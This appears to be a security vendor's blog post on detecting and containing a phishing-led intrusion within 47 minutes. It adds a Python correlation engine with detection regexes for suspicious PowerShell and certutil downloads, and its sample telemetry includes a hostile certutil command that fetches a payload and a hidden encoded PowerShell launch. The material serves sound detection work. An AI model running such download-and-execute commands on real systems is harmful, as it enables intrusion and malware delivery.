How We Detected and Stopped an Attack on a Client in 47 Minutes (Real Case)
In February 2026, one of our clients — a mid-sized financial company — came under a coordinated attack. It began with a phishing email that bypassed corporate mail filters. An employee downloaded a file that executed a PowerShell script. We received the first alert at 14:12.
The first thing that triggered was a correlation rule in the monitoring system: failed login from a new country → PowerShell launch with unusual arguments → outbound connection to an unknown IP. This gave us the first 8 seconds to react.
At 14:13, the team activated the playbook: automatic host isolation (network disconnection without shutdown) and immediate memory and disk snapshots. Simultaneously, an analyst began dissecting the command line: the script attempted to download an additional payload via certutil.
By 14:18 we already knew: the attacker was using living-off-the-land techniques to avoid leaving files on disk. We observed an attempt to access the SAM file through a legitimate process — classic credential dumping.
At 14:25 we confirmed: the attacker gained local administrative access and tried lateral movement via SMB to the file server. Network segmentation worked here — access was restricted to a specific segment only, blocking further movement.
By 14:37 we completed initial containment: terminated all suspicious processes, blocked outbound traffic from the host, and rotated passwords for all related accounts. Memory snapshot analysis revealed the payload had been loaded into memory and was attempting a reverse connection.
By 14:59 we had the full chain: phishing → PowerShell execution → credential dumping → lateral movement attempt. Total time from first alert to full containment — 47 minutes.

What enabled such a fast response?
- Pre-configured correlation rules linking events over time.
- Automated playbook that performed isolation without human delay.
- Network segmentation that prevented free lateral movement.
- Continuous endpoint telemetry monitoring.
After the incident we conducted a full debrief: added a new rule to detect certutil invoked with URLs, strengthened PowerShell script checks, and updated the segmentation policy. The client received a detailed report and a 90-day action plan.
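To make the two detections concrete, here is an added example (not code from the original post or from the client's monitoring system) of a small correlation engine that implements the rule that fired at 14:12 (failed login from a new country, then a PowerShell launch with unusual arguments, then an outbound connection to an unknown IP, all on one host within a short window) and the rule added after the debrief (certutil invoked with a URL). The event schema, the five-minute window, the allow-lists, the "unusual argument" patterns and the sample events are all assumptions constructed for illustration, including the host names and the RFC 5737 documentation IP addresses.

```python
"""Added example: a stand-alone correlation engine for the two rules in the case study.
Everything below (event schema, window, allow-lists, sample events) is constructed."""
from dataclasses import dataclass
from datetime import datetime, timedelta
import re


@dataclass
class Event:
    ts: datetime
    host: str
    kind: str   # "login_failed" | "process" | "net_out"
    data: dict  # kind-specific fields: country, cmdline, dst_ip


# Constructed allow-lists; a real deployment derives these from historical telemetry.
KNOWN_COUNTRIES = {"DE", "PL"}
KNOWN_EGRESS_IPS = {"203.0.113.10"}  # RFC 5737 documentation address

# Assumed markers of an "unusual" PowerShell command line for this rule.
SUSPICIOUS_PS_ARGS = re.compile(
    r"-enc(odedcommand)?\b|-nop\b|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|downloadstring",
    re.IGNORECASE,
)
# Post-incident rule: certutil with a URL anywhere on its command line.
CERTUTIL_URL = re.compile(r"certutil(\.exe)?\b.*\bhttps?://", re.IGNORECASE)

WINDOW = timedelta(minutes=5)  # assumed correlation window


def is_unusual_powershell(cmdline: str) -> bool:
    return "powershell" in cmdline.lower() and bool(SUSPICIOUS_PS_ARGS.search(cmdline))


def is_certutil_with_url(cmdline: str) -> bool:
    return bool(CERTUTIL_URL.search(cmdline))


def correlate_initial_access(events):
    """Rule A: return [(host, chain_start, chain_end)] for each completed three-stage chain.

    Stages must occur on the same host, in order, and all within WINDOW of the failed login.
    """
    by_host = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_host.setdefault(ev.host, []).append(ev)

    hits = []
    for host, evs in by_host.items():
        for i, login in enumerate(evs):
            if login.kind != "login_failed" or login.data.get("country") in KNOWN_COUNTRIES:
                continue
            in_window = lambda e: e.ts - login.ts <= WINDOW
            # Stage 2: unusual PowerShell launch after the failed login.
            ps_idx = next((j for j in range(i + 1, len(evs))
                           if evs[j].kind == "process" and in_window(evs[j])
                           and is_unusual_powershell(evs[j].data.get("cmdline", ""))), None)
            if ps_idx is None:
                continue
            # Stage 3: outbound connection to an IP not on the known-good list.
            net = next((e for e in evs[ps_idx + 1:]
                        if e.kind == "net_out" and in_window(e)
                        and e.data.get("dst_ip") not in KNOWN_EGRESS_IPS), None)
            if net is None:
                continue
            hits.append((host, login.ts, net.ts))
            break  # one alert per host is enough; the playbook isolates the host anyway
    return hits


def detect_certutil_download(events):
    """Rule B: every process event whose command line runs certutil with a URL."""
    return [ev for ev in events
            if ev.kind == "process" and is_certutil_with_url(ev.data.get("cmdline", ""))]


def sample_events():
    """Constructed telemetry: one host with the full chain, one host with benign look-alikes."""
    t0 = datetime(2026, 2, 17, 14, 11, 50)  # constructed timestamp
    s = lambda n: t0 + timedelta(seconds=n)
    return [
        Event(s(0), "WS-042", "login_failed", {"user": "jdoe", "country": "XX"}),
        Event(s(3), "WS-042", "process", {"cmdline": "powershell.exe -nop -w hidden -enc AAAA"}),
        Event(s(8), "WS-042", "net_out", {"dst_ip": "198.51.100.7", "dst_port": 443}),
        Event(s(40), "WS-042", "process",
              {"cmdline": "certutil.exe -urlcache -f http://198.51.100.7/payload.bin payload.bin"}),
        # Benign activity on another host: known country, scripted backup, known egress IP.
        Event(s(5), "WS-007", "login_failed", {"user": "asmith", "country": "DE"}),
        Event(s(6), "WS-007", "process", {"cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"}),
        Event(s(9), "WS-007", "net_out", {"dst_ip": "203.0.113.10", "dst_port": 443}),
        Event(s(12), "WS-007", "process", {"cmdline": "certutil.exe -verify cert.cer"}),
    ]


if __name__ == "__main__":
    evs = sample_events()
    for host, start, end in correlate_initial_access(evs):
        print(f"ALERT rule A on {host}: chain completed in {(end - start).total_seconds():.0f}s")
    for ev in detect_certutil_download(evs):
        print(f"ALERT rule B on {ev.host}: {ev.data['cmdline']}")
```

The benign host is there deliberately: a rule of this kind is only useful if a scheduled PowerShell backup and a certutil certificate check do not page the on-call analyst, so both allow-lists and the "unusual argument" pattern need tuning against the environment's own baseline before the rule goes live.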
This case is a perfect example of why we built Besspektikers as a step-by-step system: from basic threat understanding to full-cycle simulations. Without a systematic approach, 47 minutes could have turned into 47 hours.